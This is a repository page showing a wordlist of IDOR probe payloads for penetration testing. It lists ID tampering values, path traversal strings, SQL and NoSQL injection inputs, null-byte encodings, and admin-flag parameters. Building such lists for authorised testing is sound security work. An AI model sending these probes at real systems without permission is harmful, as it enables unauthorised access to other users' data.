0x5t4l1n/hunting
1
0
Fork 0
mirror of https://github.com/0x5t4l1n/hunting.git synced 2026-05-26 19:36:33 +00:00
Code Issues Packages Projects Releases Wiki Activity
Files
copilot/add-more-payloads
hunting/IDOR/idor-payloads.txt
T

218 lines
3.2 KiB
Plaintext
Raw Permalink Blame History

# IDOR (Insecure Direct Object Reference) Payloads
# Sequential ID manipulation
?id=1
?id=2
?id=100
?id=1000
# UUID manipulation
?user_id=00000000-0000-0000-0000-000000000001
?user_id=11111111-1111-1111-1111-111111111111
# Username/email enumeration
?user=admin
?user=administrator
?user=root
?email=admin@example.com
?username=test
# File/Document IDs
?file_id=1
?doc_id=1
?document=private.pdf
?report_id=1
# Account/Profile manipulation
?account_id=1
?profile_id=1
?customer_id=1
# Negative and special values
?id=-1
?id=0
?id=999999
?id=null
?id=undefined
# Array/Multiple IDs
?id[]=1&id[]=2
?ids=1,2,3
# HTTP Methods for IDOR
GET /api/user/1
POST /api/user/1
PUT /api/user/1
DELETE /api/user/1
PATCH /api/user/1
# Path-based IDOR
/users/1/profile
/users/2/profile
/users/admin/profile
/api/v1/users/1
/api/v1/users/2
/api/v2/user/1/settings
/api/user/1/private
/api/user/2/documents
# Subdomain enumeration
user1.example.com
user2.example.com
admin.example.com
# GUID/UUID variations
?id=00000000-0000-0000-0000-000000000000
?id=ffffffff-ffff-ffff-ffff-ffffffffffff
?id=12345678-1234-1234-1234-123456789012
?uuid=a1b2c3d4-e5f6-4a5b-8c7d-9e0f1a2b3c4d
# Base64 encoded IDs
?id=MQ==
?id=Mg==
?id=YWRtaW4=
?user=dXNlcjE=
# Hash-based IDs
?id=5f4dcc3b5aa765d61d8327deb882cf99
?id=098f6bcd4621d373cade4e832627b4f6
?token=abc123def456
# Numeric variations
?id=0001
?id=0010
?id=0100
?id=1000
?user_id=00001
?customer_id=00100
# Special characters in IDs
?id=../1
?id=../../2
?id=..%2f1
?id=%2e%2e%2f1
# API endpoint variations
/api/orders/1
/api/orders/2
/api/invoices/1
/api/transactions/1
/api/messages/1
/api/posts/1/edit
/api/comments/1/delete
# Cookie-based IDOR
Cookie: user_id=1
Cookie: user_id=2
Cookie: session_id=user1
Cookie: account=1
# Header-based IDOR
X-User-Id: 1
X-User-Id: 2
X-Account-Id: 1
X-Customer-Id: 2
# JSON body IDOR
{"user_id": 1}
{"user_id": 2}
{"account_id": 1}
{"profile_id": 2}
# Compound IDs
?user_id=1&account_id=1
?id=1&type=admin
?user=1&role=admin
# Email-based enumeration
?email=user1@example.com
?email=user2@example.com
?email=admin@example.com
?email=test@test.com
# Phone number enumeration
?phone=1234567890
?phone=+11234567890
?mobile=9876543210
# Date-based IDs
?date=2024-01-01
?created_at=2024-01-01
?year=2024&month=01&day=01
# Predictable patterns
?ref=INV-001
?ref=INV-002
?order=ORD-1000
?order=ORD-1001
?ticket=TKT-001
# Encoded variations
?id=1%00
?id=1%0a
?id=1%0d
?id=1%20
# Boolean values
?admin=true
?admin=false
?is_admin=1
?is_admin=0
?superuser=true
# Wildcard attempts
?id=*
?user=*
?search=*
# Negative numbers
?id=-1
?id=-10
?id=-100
?offset=-1
# Large numbers
?id=999999999
?id=2147483647
?id=9999999999999
# Float/Decimal
?id=1.0
?id=1.5
?amount=0.01
# SQL-style injection in IDOR
?id=1' OR '1'='1
?id=1 OR 1=1
?id=1 UNION SELECT * FROM users
# NoSQL-style injection in IDOR
?id[$ne]=1
?id[$gt]=0
?user[$regex]=admin
# XML-style
?id=<id>1</id>
?user=<user>admin</user>
# GraphQL IDOR
?query={user(id:1){name,email}}
?query={user(id:2){name,email}}
# REST variations
/users/me
/users/self
/users/current
/users/1
/users/2
# Hyphenated IDs
?id=user-1
?id=account-2
?ref=invoice-001
# Underscore IDs
?id=user_1
?id=account_2
?id=customer_001
Reference in New Issue View Git Blame Copy Permalink